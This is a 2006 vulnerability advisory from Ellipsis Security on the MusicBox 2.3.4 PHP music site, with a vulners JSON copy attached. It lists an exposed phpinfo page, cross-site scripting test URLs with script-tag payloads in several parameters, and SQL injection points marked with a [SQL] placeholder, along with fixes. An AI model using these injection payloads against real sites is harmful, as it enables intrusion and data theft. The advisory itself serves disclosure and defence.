Description
MusicBox 2.3.4
http://www.musicboxv2.com
------------
PHPinfo page
------------
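/phpinfo.php
(phpinfo() output reachable without authentication: it discloses the PHP version, configuration and server environment, so the file should be removed or access to it restricted)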
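---------------------------------------------------------------
Cross Site Scripting (XSS) - id, term, type and show parameters
---------------------------------------------------------------
The test strings below show these parameters being written into the page without HTML output encoding; alert(/EllipsisSecurityTest/) is only a marker.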
http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists
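-----------------------------------------------
SQL injection - start, show and page parameters
-----------------------------------------------
[SQL] marks the point where the request value reaches the query unsanitised. The three parameters appear to be numeric, so they should be validated as integers and bound through parameterised queries.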
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
{"id": "SECURITYVULNS:DOC:13612", "bulletinFamily": "software", "title": "MusicBox <= 2.3.4 XSS SQL injection Vulnerability", "description": "MusicBox 2.3.4\r\nhttp://www.musicboxv2.com\r\n------------\r\nPHPinfo page\r\n------------\r\n/phpinfo.php\r\n--------------------------\r\nCross Site Scripting (XSS)\r\n--------------------------\r\nhttp://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0\r\nhttp://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTest/)</script>&page=0\r\nhttp://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest/)</script>&in=song&action=search&start=0\r\nhttp://www.target.xx/index.php?action=top&show=5&type=<script>alert(/EllipsisSecurityTest/)</script>\r\nhttp://www.target.xx/index.php?action=top&show=<script>alert(/EllipsisSecurityTest/)</script>&type=Artists\r\n-------------\r\nSQL injection\r\n-------------\r\nhttp://www.target.xx/index.php?term=hit&in=song&action=search&start=`[SQL]\r\nhttp://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists\r\nhttp://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]\r\n-----------------\r\nEllipsis Security\r\nhttp://www.ellsec.org", "published": "2006-07-25T00:00:00", "modified": "2006-07-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13612", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 35, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6399"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6399"]}]}, "exploitation": null, "vulnersScore": -0.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645619300, "score": 1659803227}, "_internal": 
{"score_hash": "41702701f4b19384011a52aac980cb6c"}}
{}